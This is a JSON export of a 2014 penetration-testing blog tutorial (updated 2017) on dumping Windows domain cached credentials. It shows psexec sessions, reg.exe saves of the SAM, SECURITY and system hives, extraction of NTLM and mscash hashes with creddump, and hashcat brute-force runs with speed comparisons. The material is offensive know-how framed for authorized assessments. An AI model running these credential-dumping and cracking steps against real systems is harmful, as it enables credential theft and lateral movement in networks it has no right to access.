{"id":751,"date":"2014-01-22T21:40:39","date_gmt":"2014-01-23T03:40:39","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?page_id=751"},"modified":"2017-11-01T21:01:28","modified_gmt":"2017-11-02T03:01:28","slug":"windows-password-cache-mscache-mscash-v2","status":"publish","type":"page","link":"https:\/\/www.jedge.com\/wordpress\/windows-password-cache-mscache-mscash-v2\/","title":{"rendered":"Windows Password Cache (mscache \/ mscash) v2"},"content":{"rendered":"<p>10\/31\/2017 Update:  Look, I wrote this article two years ago and I see people still visit it.  I&#8217;ve made some updates and while these commands and tools are all still valid they do not hold a candle to the power of crackmapexec (CME) found at <a href=\"https:\/\/github.com\/byt3bl33d3r\/CrackMapExec\">https:\/\/github.com\/byt3bl33d3r\/CrackMapExec<\/a>.<\/p>\n<p>I wrote an <a title=\"Windows Password Cache\" href=\"http:\/\/www.jedge.com\/wordpress\/windows-password-cache\/\">article <\/a>years ago on Windows Password Cache and this page continues to pop up in Google search results. People are still looking for information about the Windows Password Cache. Also known as mscash or mscache. \u00a0The real name is <a title=\"Domain Cached Credentials\" href=\"http:\/\/support.microsoft.com\/kb\/913485\" target=\"_blank\">Domain Cached Credentials<\/a> (DCC). \u00a0Well my previous article referenced PWDumpX v1.4 and I would like to move people away from using that tool during an assessment or penetration test. When I get Domain Administrator I may run PWDumpX just to identify for reporting purposes the systems that do not have Antivirus installed or functioning properly. You know because PWDumpX will actually return results. But that is the extent of the use of PWDumpX. 
When it flags the enterprise antivirus and they call me up saying they spotted me I tell them nicely that I&#8217;ve been Domain Admin all week and by the way\u2026your file server has no antivirus.<br \/>\n<!--more--><br \/>\nAlso years ago I wrote an <a title=\"NTBACKUP:  more than DR\/BCP (Updated)\" href=\"http:\/\/www.jedge.com\/wordpress\/2009\/06\/ntbackup-more-than-drbcp\/\" target=\"_blank\">article <\/a>on the Windows ntbackup utility. You back up the system state, which creates a backup of the Windows registry and places the files in C:\\Windows\\repair. You copy the SAM, SECURITY, and system files to your own machine and use the Creddump Python scripts to produce the same results as PWDumpX (except for the PWHistory file).<\/p>\n<p>What I\u2019m writing up is nothing new and is covered in numerous places, specifically the sites listed at the end of this document. However, I\u2019m putting this out there because it can be tough using Google to find exactly what you are asking for when it comes to Windows 7\/8 and Server 2008\/2012. This tutorial will use zero \u201chacker\u201d tools on a target host. As with previous tutorials you will need local administrative privileges on the host. This tutorial is for pivoting within an environment by obtaining Domain credentials\u2026hopefully Domain Admin.<\/p>\n<p>There are plenty of tools and techniques that do not even require you to crack a password hash but they will not be discussed here. When conducting a penetration test there is nothing better than showing the C Level their password and what data you were able to exfiltrate using his or her credentials. Especially if the password hasn&#8217;t changed in ten years and it is the word \u201cmike\u201d. You know\u2026a nickname for his first name.<\/p>\n<p>Enough chit chat\u2026Let\u2019s do this!<\/p>\n<p><strong>Windows 2003 Server<\/strong><\/p>\n<p>Log into the server using psexec and the local Administrator account. 
Obtaining the local Administrator account credentials is outside the scope of this tutorial. Use the reg.exe command to save the SAM, SECURITY, and system hive keys.<\/p>\n<p><pre><code>C:\\tools\\PSTools&gt;psexec \\\\192.168.1.103 -u administrator -p password cmd.exe\n\nPsExec v1.98 - Execute processes remotely\nCopyright (C) 2001-2010 Mark Russinovich\nSysinternals - www.sysinternals.com\n\nMicrosoft Windows [Version 5.2.3790]\n(C) Copyright 1985-2003 Microsoft Corp.\n\nC:\\WINDOWS\\system32&gt;reg.exe save HKLM\\SAM ..\/repair\/SAM.192.168.1.103\nThe operation completed successfully.\n\nC:\\WINDOWS\\system32&gt;reg.exe save HKLM\\SECURITY ..\/repair\/SECURITY.192.168.1.103\nThe operation completed successfully.\n\nC:\\WINDOWS\\system32&gt;reg.exe save HKLM\\system ..\/repair\/system.192.168.1.103\nThe operation completed successfully.<\/code><\/pre><\/p>\n<p>Copy the files from the remote host to your local machine with Python installed.<\/p>\n<p><pre><code>Z:\\&gt;copy \\\\192.168.1.103\\c$\\Windows\\repair\\SAM.192.168.1.103 z:\\SAM.192.168.1.103\n1 file(s) copied.\n\nZ:\\&gt;copy \\\\192.168.1.103\\c$\\Windows\\repair\\SECURITY.192.168.1.103 z:\\SECURITY.192.168.1.103\n1 file(s) copied.\n\nZ:\\&gt;copy \\\\192.168.1.103\\c$\\Windows\\repair\\system.192.168.1.103 z:\\system.192.168.1.103\n1 file(s) copied.<\/code><\/pre><\/p>\n<p>Now that we have the registry files we will use <a title=\"Creddump Python Scripts\" href=\"https:\/\/code.google.com\/p\/creddump\/\" target=\"_blank\">Creddump <\/a>to extract the local user hashes and cached Domain User hashes. By default Windows 2003 Server saves the last 10 Domain users to interactively authenticate to the host. This can be through the console, Remote Desktop Protocol (RDP), or using the RunAs command. 
Hashes will not be cached if you authenticate to the host through SMB.<\/p>\n<p><pre><code>root@xVidia:~\/tools\/creddump-0.3# python pwdump.py ~\/cacheTest\/Win2003\/system.192.168.1.103 ~\/cacheTest\/Win2003\/SAM.192.168.1.103\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bbcef4ffcfe931235927d4134505691b:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nedge:1001:aad3b435b51404eeaad3b435b51404ee:85055a227564439e1f1b75db8a01e135:::\njames:1003:aad3b435b51404eeaad3b435b51404ee:e547aa58e70cf7e18baf88ee52601296:::<\/code><\/pre><\/p>\n<p>This tutorial will demonstrate using oclHashcat to crack the mscash v1 hash (Windows 2000\/XP\/2003).<\/p>\n<p><pre><code>root@xVidia:~\/tools\/oclHashcat-1.01# .\/cudaHashcat64.bin -a 3 -m 1100 mscash1.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1\ncudaHashcat v1.01 starting...\n\nHashes: 1 total, 1 unique salts, 1 unique digests\nBitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 80c\nDevice #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU\nDevice #1: WARNING! 
Kernel exec timeout is not disabled, it might cause you errors of code 702\nDevice #1: Kernel .\/kernels\/4318\/m1100_a3.sm_30.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/markov_le_v1.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/bzero.64.ptx\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit =&gt; s\nSession.Name...: cudaHashcat\nStatus.........: Running\nInput.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]\nHash.Target....: f36bc05594a9a108083d7bcd44e731e3:mscache_test1\nHash.Type......: DCC, mscash\nTime.Started...: Wed Jan 22 13:47:37 2014 (8 secs)\nTime.Estimated.: Tue Jan 28 08:59:42 2014 (5 days, 19 hours)\nSpeed.GPU.#1...: 448.5 MH\/s\nRecovered......: 0\/1 (0.00%) Digests, 0\/1 (0.00%) Salts\nProgress.......: 3694657536\/218340105584896 (0.00%)\nRejected.......: 0\/3694657536 (0.00%)\nHWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit =&gt;<\/code><\/pre><\/p>\n<p>My graphics card, a Nvidia GeForce GTX 650 Ti, can brute force one hash at 448 million a second. An eight (8) character password of upper, lower, and digits can be cracked in under 6 days. That is every combination. I point this out because we will now see how long it takes with mscash v2.<\/p>\n<p><strong>Windows 2008 Server<\/strong><\/p>\n<p><pre><code>C:\\tools\\PSTools&gt;psexec \\\\192.168.1.88 -u Administrator -p password cmd.exe\n\nPsExec v1.98 - Execute processes remotely\nCopyright (C) 2001-2010 Mark Russinovich\nSysinternals - www.sysinternals.com\nMicrosoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation. 
All rights reserved.\n\nC:\\Windows\\system32&gt;whoami\nwin-arn6ersoj2m\\administrator\n\nC:\\Windows\\system32&gt;reg.exe save HKLM\\SAM SAM.192.168.1.88\nThe operation completed successfully.\n\nC:\\Windows\\system32&gt;reg.exe save HKLM\\SECURITY SECURITY.192.168.1.88\nThe operation completed successfully.\n\nC:\\Windows\\system32&gt;reg.exe save HKLM\\system system.192.168.1.88\nThe operation completed successfully.<\/code><\/pre><\/p>\n<p>Again copy them over to your local host and use Creddump to obtain the hashes. However, this time you have to use a patched version of Creddump that supports Windows Vista\/7\/2008.<\/p>\n<p>I\u2019ve seen the updated code posted in forum posts but I&#8217;ve decided to host it on this site.<\/p>\n<p><a href=\"http:\/\/www.jedge.com\/utilities\/windows7.creddump.tar.gz\">http:\/\/www.jedge.com\/utilities\/windows7.creddump.tar.gz<\/a><\/p>\n<p><pre><code>Z:\\&gt;copy \\\\192.168.1.88\\c$\\Windows\\System32\\SAM.192.168.1.88 z:\\SAM.192.168.1.88\n1 file(s) copied.\n\nZ:\\&gt;copy \\\\192.168.1.88\\c$\\Windows\\System32\\SECURITY.192.168.1.88 z:\\SECURITY.192.168.1.88\n1 file(s) copied.\n\nZ:\\&gt;copy \\\\192.168.1.88\\c$\\Windows\\System32\\system.192.168.1.88 z:\\system.192.168.1.88\n1 file(s) copied.\n\nroot@xVidia:~# wget http:\/\/www.jedge.com\/utilities\/windows7.creddump.tar.gz\n--2014-01-22 13:30:16-- http:\/\/www.jedge.com\/utilities\/windows7.creddump.tar.gz\nResolving www.jedge.com (www.jedge.com)... 74.220.207.132\nConnecting to www.jedge.com (www.jedge.com)|74.220.207.132|:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 39562 (39K) [application\/x-gzip]\nSaving to: \u2018windows7.creddump.tar.gz\u2019\n\n100%[=======================================&gt;] 39,562 224KB\/s in 0.2s\n\n2014-01-22 13:30:17 (224 KB\/s) - \u2018windows7.creddump.tar.gz\u2019 saved [39562\/39562]\n\nroot@xVidia:~# tar zxf windows7.creddump.tar.gz\nroot@xVidia:~# cd creddump\/\nroot@xVidia:~\/creddump# python cachedump.py\nusage: cachedump.py &lt;system hive&gt; &lt;security hive&gt; &lt;vista&gt;\nroot@xVidia:~\/creddump# python cachedump.py ~\/cacheTest\/Win2008\/system ~\/cacheTest\/Win2008\/SECURITY vista\n\nstrongpassword:62c0a5bb83721869f0104a51f34ceb03:jedge:jedge.lcl\nweakpassword:517e61714cbdcfd396f4b3b2b077c921:jedge:jedge.lcl\nmscache_test2:c9736046ca3f3318e7847fb4dae91aa8:jedge:jedge.lcl\njedge:2838f8db1d1eb37651d9d695a3e41c42:jedge:jedge.lcl<\/code><\/pre><\/p>\n<p>Now here is the part that sucks. Microsoft wised up with mscash. The hash is computed as the previous version but with an extra step added to make it computationally intense to hinder brute force attacks. From <a title=\"Openwell Wiki MSCash2\" href=\"http:\/\/openwall.info\/wiki\/john\/MSCash2\" target=\"_blank\">http:\/\/openwall.info\/wiki\/john\/MSCash2<\/a><\/p>\n<p>Apply <a href=\"http:\/\/en.wikipedia.org\/wiki\/PBKDF2\" target=\"_blank\">PBKDF2 <\/a>with SHA1 as HMAC, an iteration count of 10240, the old DCC hash as password and the Unicode username as salt in order to generate the DCC2 (MSCash2) hash. Only the first 128 bits of the resulting 160 bits are used.<\/p>\n<p>Well how much of a computational hindrance is this new step? 
See below\u2026<\/p>\n<p><pre><code>root@xVidia:~\/tools\/oclHashcat-1.01# .\/cudaHashcat64.bin -a 3 -m 2100 mscash2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1\ncudaHashcat v1.01 starting...\n\nHashes: 1 total, 1 unique salts, 1 unique digests\nBitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 80c\nDevice #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU\nDevice #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702\nDevice #1: Kernel .\/kernels\/4318\/m2100.sm_30.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/markov_le_v1.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/bzero.64.ptx\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit =&gt; s\nSession.Name...: cudaHashcat\nStatus.........: Running\nInput.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]\nHash.Target....: c9736046ca3f3318e7847fb4dae91aa8:mscache_test2\nHash.Type......: DCC2, mscash2\nTime.Started...: Wed Jan 22 13:50:34 2014 (12 secs)\nTime.Estimated.: &gt; 10 Years\nSpeed.GPU.#1...: 10872 H\/s\nRecovered......: 0\/1 (0.00%) Digests, 0\/1 (0.00%) Salts\nProgress.......: 131072\/218340105584896 (0.00%)\nRejected.......: 0\/131072 (0.00%)\nHWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan<\/code><\/pre><\/p>\n<p>For mscash v1 you can do 448 million guesses a second while mscash v2 can only do 10,800 a second on the same hardware. An eight (8) character password of upper, lower, and digits takes less than six (6) days for mscash v1 and over ten (10) years for mscash v2<\/p>\n<p>So what about the local hashes? They are stored using NTLMv2 and nothing has changed in Windows 7\/2008. 
That is a problem because while the LanManager (LM) hash is in the rear-view mirror back in Windows XP\/2003 land, which we know no longer exists in any environment, the NTLMv2 hash is still a piece of crap (technical term).<\/p>\n<p><pre><code>root@xVidia:~\/tools\/oclHashcat-1.01# .\/cudaHashcat64.bin -a 3 -m 1000 ntlmv2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1\ncudaHashcat v1.01 starting...\n\nHashes: 1 total, 1 unique salts, 1 unique digests\nBitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 80c\nDevice #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU\nDevice #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702\nDevice #1: Kernel .\/kernels\/4318\/m1000_a3.sm_30.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/markov_le_v1.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/bzero.64.ptx\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit =&gt; s\nSession.Name...: cudaHashcat\nStatus.........: Running\nInput.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]\nHash.Target....: bbcef4ffcfe931235927d4134505691b\nHash.Type......: NTLM\nTime.Started...: Wed Jan 22 14:12:01 2014 (5 secs)\nTime.Estimated.: Fri Jan 24 05:47:11 2014 (1 day, 15 hours)\nSpeed.GPU.#1...: 1604.3 MH\/s\nRecovered......: 0\/1 (0.00%) Digests, 0\/1 (0.00%) Salts\nProgress.......: 8464105472\/218340105584896 (0.00%)\nRejected.......: 0\/8464105472 (0.00%)\nHWMon.GPU.#1...: -1% Util, 31c Temp, 40% Fan<\/code><\/pre><\/p>\n<p>1.6 billion, with a B, guesses a second. You know password reuse never happens in any environment. Just like Windows XP\/2003 is extinct. If you happen to compromise a target via a vulnerability\u2026say Apache Tomcat is installed on a Windows 2008 server with default credentials, and runs as SYSTEM by default. 
Well\u2026obtaining the local Administrator NTLMv2 password hash is something that would be quite useful in cracking and very possible with a cheap graphics card.<\/p>\n<p>Or you could send it to <a title=\"cloudcracker.com\" href=\"http:\/\/www.cloudcracker.com\" target=\"_blank\">cloudcracker.com<\/a> and for a couple bucks you can run Trillions, yes\u2026with a freakin \u201cT\u201d of password guesses against the hash in an hour.<br \/>\n<kbd>Update 10\/31\/2017 - site no longer available.<\/kbd><\/p>\n<p>Update: 10\/31\/2017 &#8211; I have a newer but still inexpensive Nvidia graphics card (GeForce GTX 970) and wanted to update this article on statistics using the latest version of Hashcat (4.0.0). To update to the latest Nvidia drivers see this tutorial <a href=\"http:\/\/www.jedge.com\/wordpress\/2017\/11\/purge-and-install-latest-nvidia-drivers-ubuntu\/\">http:\/\/www.jedge.com\/wordpress\/2017\/11\/purge-and-install-latest-nvidia-drivers-ubuntu\/<\/a><\/p>\n<p>Running hashcat against Windows mscash\/mscache\/dcc\/domain cached credentials is a bit faster than my older card.  Almost 10x faster and even faster than cracking NTLMv1 on the older card! 
<\/p>\n<p><pre><code># .\/hashcat -m1100 -a3 mscash1.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1 -O -w 3\nhashcat (v4.0.0) starting...\n\nOpenCL Platform #1: NVIDIA Corporation\n======================================\n* Device #1: GeForce GTX 970, 1008\/4033 MB allocatable, 13MCU\n\nHashes: 2 digests; 2 unique digests, 2 unique salts\nBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates\n\nApplicable optimizers:\n* Optimized-Kernel\n* Zero-Byte\n* Precompute-Init\n* Precompute-Merkle-Demgard\n* Early-Skip\n* Not-Iterated\n* Brute-Force\n\nPassword length minimum: 0\nPassword length maximum: 27\n\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 75c\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =&gt; s\n\nSession..........: hashcat\nStatus...........: Running\nHash.Type........: Domain Cached Credentials (DCC), MS Cache\nHash.Target......: mscash1.example.txt\nTime.Started.....: Wed Nov&nbsp;&nbsp;1 20:48:30 2017 (14 secs)\nTime.Estimated...: Fri Nov&nbsp;&nbsp;3 00:09:27 2017 (1 day, 3 hours)\nGuess.Mask.......: ?1?1?1?1?1?1?1?1 [8]\nGuess.Charset....: -1 ?u?l?d, -2 Undefined, -3 Undefined, -4 Undefined\nGuess.Queue......: 1\/1 (100.00%)\nSpeed.Dev.#1.....:&nbsp;&nbsp;4435.2 MH\/s (91.13ms)\nRecovered........: 0\/2 (0.00%) Digests, 0\/2 (0.00%) Salts\nProgress.........: 60257992704\/436680211169792 (0.01%)\nRejected.........: 0\/60257992704 (0.00%)\nRestore.Point....: 7667712\/56800235584 (0.01%)\nCandidates.#1....: SnHiAW00 -&gt; XzwXxX00\nHWMon.Dev.#1.....: Temp: 65c Fan: 33% Util:100% Core:1316MHz Mem:3004MHz Bus:16\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =&gt;\n<\/code><\/pre><\/p>\n<p>With a newer graphics card is there any real chance of cracking an mscash v2\/mscache v2\/dcc2 password?  
No&#8230;at least hashcat can now accurately tell you it will take 190 years to iterate through all combinations at 145,100 guesses a second (13x faster than the older GeForce GTX 650 Ti).  Now you can run a dictionary attack and may get lucky. <\/p>\n<p><pre><code># .\/hashcat -m2100 -a3 mscash2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1 -O -w 3\nhashcat (v4.0.0) starting...\n\nOpenCL Platform #1: NVIDIA Corporation\n======================================\n* Device #1: GeForce GTX 970, 1008\/4033 MB allocatable, 13MCU\n\nHashes: 4 digests; 4 unique digests, 4 unique salts\nBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates\n\nApplicable optimizers:\n* Zero-Byte\n* Brute-Force\n* Slow-Hash-SIMD-LOOP\n\nPassword length minimum: 0\nPassword length maximum: 256\n\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 75c\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =&gt; s\n\nSession..........: hashcat\nStatus...........: Running\nHash.Type........: Domain Cached Credentials 2 (DCC2), MS Cache 2\nHash.Target......: mscash2.example.txt\nTime.Started.....: Wed Nov&nbsp;&nbsp;1 21:47:45 2017 (4 secs)\nTime.Estimated...: Sun Jul 10 04:33:15 2208 (190 years, 250 days)\nGuess.Mask.......: ?1?1?1?1?1?1?1?1 [8]\nGuess.Charset....: -1 ?u?l?d, -2 Undefined, -3 Undefined, -4 Undefined\nGuess.Queue......: 1\/1 (100.00%)\nSpeed.Dev.#1.....:&nbsp;&nbsp; 145.1 kH\/s (72.97ms)\nRecovered........: 0\/4 (0.00%) Digests, 0\/4 (0.00%) Salts\nProgress.........: 425984\/873360422339584 (0.00%)\nRejected.........: 0\/425984 (0.00%)\nRestore.Point....: 0\/3521614606208 (0.00%)\nCandidates.#1....: 1arierin -&gt; 1yyZY123\nHWMon.Dev.#1.....: Temp: 62c Fan: 33% Util:100% Core:1316MHz Mem:3004MHz Bus:16\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =&gt;<\/code><\/pre><\/p>\n<p>Helpful Links because I didn&#8217;t come up with any of this myself.<\/p>\n<p><a href=\"http:\/\/openwall.info\/wiki\/john\/MSCash\" 
target=\"_blank\">http:\/\/openwall.info\/wiki\/john\/MSCash<\/a><\/p>\n<p><a href=\"http:\/\/openwall.info\/wiki\/john\/MSCash2\" target=\"_blank\">http:\/\/openwall.info\/wiki\/john\/MSCash2<\/a><\/p>\n<p><a href=\"http:\/\/bernardodamele.blogspot.com\/2011\/12\/dump-windows-password-hashes.html\" target=\"_blank\">\u00a0http:\/\/bernardodamele.blogspot.com\/2011\/12\/dump-windows-password-hashes.html<\/a><\/p>\n<p><a href=\"http:\/\/computer-forensics.sans.org\/blog\/2012\/02\/21\/protecting-privileged-domain-account-safeguarding-password-hashes\" target=\"_blank\">http:\/\/computer-forensics.sans.org\/blog\/2012\/02\/21\/protecting-privileged-domain-account-safeguarding-password-hashes<\/a><\/p>\n<p><a href=\"http:\/\/technet.microsoft.com\/en-us\/library\/cc732643.aspx\">http:\/\/technet.microsoft.com\/en-us\/library\/cc732643.aspx<\/a><\/p>\n<p><a href=\"https:\/\/code.google.com\/p\/creddump\/\" target=\"_blank\">https:\/\/code.google.com\/p\/creddump\/<\/a><\/p>\n<p><a href=\"http:\/\/support.microsoft.com\/kb\/913485\" target=\"_blank\">http:\/\/support.microsoft.com\/kb\/913485<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>10\/31\/2017 Update: Look, I wrote this article two years ago and I see people still visit it. I&#8217;ve made some updates and while these commands and tools are all still valid they do not hold a candle to the power of crackmapexec (CME) found at https:\/\/github.com\/byt3bl33d3r\/CrackMapExec. 
I wrote an article years ago on Windows Password [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-751","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=751"}],"version-history":[{"count":9,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/751\/revisions"}],"predecessor-version":[{"id":1060,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/751\/revisions\/1060"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}